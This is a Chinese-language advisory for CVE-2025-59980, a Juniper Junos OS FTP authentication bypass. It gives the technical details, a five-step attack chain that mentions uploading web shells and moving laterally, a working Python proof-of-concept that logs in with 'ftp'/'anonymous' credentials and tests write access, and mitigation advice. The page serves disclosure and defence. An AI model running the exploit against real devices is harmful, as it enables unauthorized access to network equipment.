CVE-2025-59980 Juniper Junos OS FTP服务器认证绕过漏洞

漏洞信息

漏洞编号

CVE-2025-59980

漏洞类型

认证绕过

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Juniper Networks Junos OS（FTP服务器组件）

漏洞概述

CVE-2025-59980是Juniper Networks Junos OS操作系统FTP服务器组件中存在的一个认证绕过漏洞（Authentication Bypass by Primary Weakness）。该漏洞允许未经认证的网络攻击者获取设备上有限的读写访问权限。具体而言，当Juniper Junos OS设备的FTP服务器功能被启用，并且系统中配置了名为"ftp"或"anonymous"的用户时，攻击者可以使用这些用户名登录FTP服务器，而无需提供配置的密码。登录成功后，攻击者将获得其主目录的读写权限，从而可以上传、下载、修改或删除该目录中的文件。

该漏洞的CVSS 3.1评分为6.5分，属于中危级别。其攻击向量为网络攻击（AV:N），攻击复杂度低（AC:L），无需任何权限（PR:N），也无需用户交互（UI:N）。在影响方面，该漏洞对机密性（C:L）和完整性（I:L）存在低程度的影响，但对可用性（A:N）没有影响。

该漏洞由Juniper Networks的安全团队[email protected]发现，并于2025年10月9日公开披露。受影响的版本包括22.4R3-S8之前的所有版本、23.2R2-S3之前的23.2系列版本，以及23.4R2之前的23.4系列版本。Juniper建议用户尽快升级到修复版本以消除安全风险。

技术细节

该漏洞的根本原因在于Juniper Junos OS FTP服务器在处理特定用户名时的认证逻辑缺陷。当FTP服务器启用且系统中存在名为"ftp"或"anonymous"的用户账户时，FTP守护进程未能正确执行密码验证流程，而是直接允许这些特殊用户名的认证请求通过，跳过了密码校验步骤。

从技术层面分析，FTP协议在设计时本身就支持匿名访问机制（anonymous FTP），许多FTP服务器实现会将"anonymous"和"ftp"作为保留用户名处理，允许用户以任意密码（通常以邮箱地址作为密码）登录。Juniper Junos OS的FTP实现在集成这一传统匿名访问特性时，未能妥善处理本地用户配置的情况。当管理员在本地配置了名为"ftp"或"anonymous"的用户并设置了密码后，FTP服务器仍然按照匿名访问的逻辑处理认证，导致配置的用户密码被完全忽略。

利用方式方面，攻击者只需通过网络连接到目标设备的FTP服务端口（默认21端口），使用"ftp"或"anonymous"作为用户名，密码字段留空或填写任意字符串，即可成功登录。登录后，攻击者将获得该用户主目录的完整读写权限，可以执行文件上传、下载、修改和删除等操作。

虽然该漏洞的影响范围限于特定用户的家目录，且权限有限（无root权限），但攻击者仍可能利用此访问权限进行进一步攻击，例如上传恶意脚本、修改配置文件、窃取敏感数据，或以此为跳板进行内网横向移动。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过网络扫描（如Nmap）识别目标Juniper Junos OS设备开放的FTP服务端口（默认21端口），确认目标运行Juniper Junos OS且FTP服务已启用。

STEP 2

步骤2：用户枚举

攻击者尝试使用特殊保留用户名"ftp"或"anonymous"连接FTP服务。由于这些用户名在FTP协议中被广泛用于匿名访问，攻击者推测Juniper设备可能存在认证缺陷。

STEP 3

步骤3：认证绕过

攻击者使用"ftp"或"anonymous"作为用户名，密码留空或填写任意字符串（如邮箱地址）进行FTP登录。由于漏洞的存在，FTP服务器跳过了密码验证步骤，直接允许登录成功。

STEP 4

步骤4：获取文件访问权限

登录成功后，攻击者获得该用户主目录的完整读写权限，可以列出目录内容、上传文件、下载文件、修改或删除现有文件。

STEP 5

步骤5：进一步利用

攻击者可上传恶意脚本或配置文件（如修改路由器配置、上传Web Shell），窃取敏感数据，或以此为立足点进行内网横向移动，尝试提权获取更高权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-59980 PoC - Juniper Junos OS FTP Authentication Bypass # This PoC demonstrates the authentication bypass vulnerability in Juniper Junos OS FTP server # When a user named "ftp" or "anonymous" is configured, login succeeds without password verification import ftplib import sys def exploit_ftp_bypass(target_host, target_port=21): """ Exploit CVE-2025-59980: FTP Authentication Bypass on Juniper Junos OS """ bypass_users = ["ftp", "anonymous"] # Try empty password or arbitrary password (traditional anonymous convention) bypass_passwords = ["", "[email protected]", "ftp", "guest"] for username in bypass_users: for password in bypass_passwords: try: print(f"[*] Trying username='{username}', password='{password}'") ftp = ftplib.FTP() ftp.connect(target_host, target_port, timeout=10) # Attempt login with bypass credentials response = ftp.login(username, password) print(f"[+] Bypass successful! Server response: {response}") # Demonstrate read-write access to home directory print(f"[*] Current directory: {ftp.pwd()}") # List files in home directory print("[*] Directory listing:") files = [] ftp.dir(files.append) for f in files: print(f" {f}") # Write test file to demonstrate write access test_filename = "poc_test_file.txt" test_content = b"CVE-2025-59980 PoC - Authentication Bypass Confirmed" from io import BytesIO ftp.storbinary(f"STOR {test_filename}", BytesIO(test_content)) print(f"[+] Successfully uploaded {test_filename} (write access confirmed)") # Read the uploaded file back to confirm round-trip from io import StringIO buffer = StringIO() ftp.retrlines(f"RETR {test_filename}", buffer.write) print(f"[+] File content read back: {buffer.getvalue().strip()}") # Cleanup ftp.delete(test_filename) ftp.quit() return True except ftplib.error_perm as e: print(f"[-] Login failed: {e}") continue except Exception as e: print(f"[-] Connection error: {e}") continue print("[-] All bypass attempts failed") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_host> [target_port]") print(f"Example: {sys.argv[0]} 192.168.1.1 21") sys.exit(1) host = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 21 exploit_ftp_bypass(host, port)

影响范围

Juniper Junos OS < 22.4R3-S8

Juniper Junos OS 23.2 < 23.2R2-S3

Juniper Junos OS 23.4 < 23.4R2

防御指南

临时缓解措施

在无法立即升级系统的情况下，建议采取以下临时缓解措施：1）立即禁用Juniper Junos OS设备的FTP服务器功能，停止FTP服务；2）如果必须使用FTP服务，应删除本地配置的名为"ftp"和"anonymous"的用户账户；3）在网络层面通过ACL或防火墙规则限制FTP端口（默认21）的访问，仅允许可信管理主机连接；4）密切监控FTP服务的日志，及时发现异常的匿名登录行为；5）考虑使用SFTP或SCP等加密传输协议替代不安全的FTP协议；6）定期检查FTP用户主目录中的文件变更，及时发现潜在的攻击痕迹。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-59980
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-59980
3 Details https://www.cvedetails.com/cve/CVE-2025-59980/
4 VulDB https://vuldb.com/cve/CVE-2025-59980
5 Link https://supportportal.juniper.net/JSA103167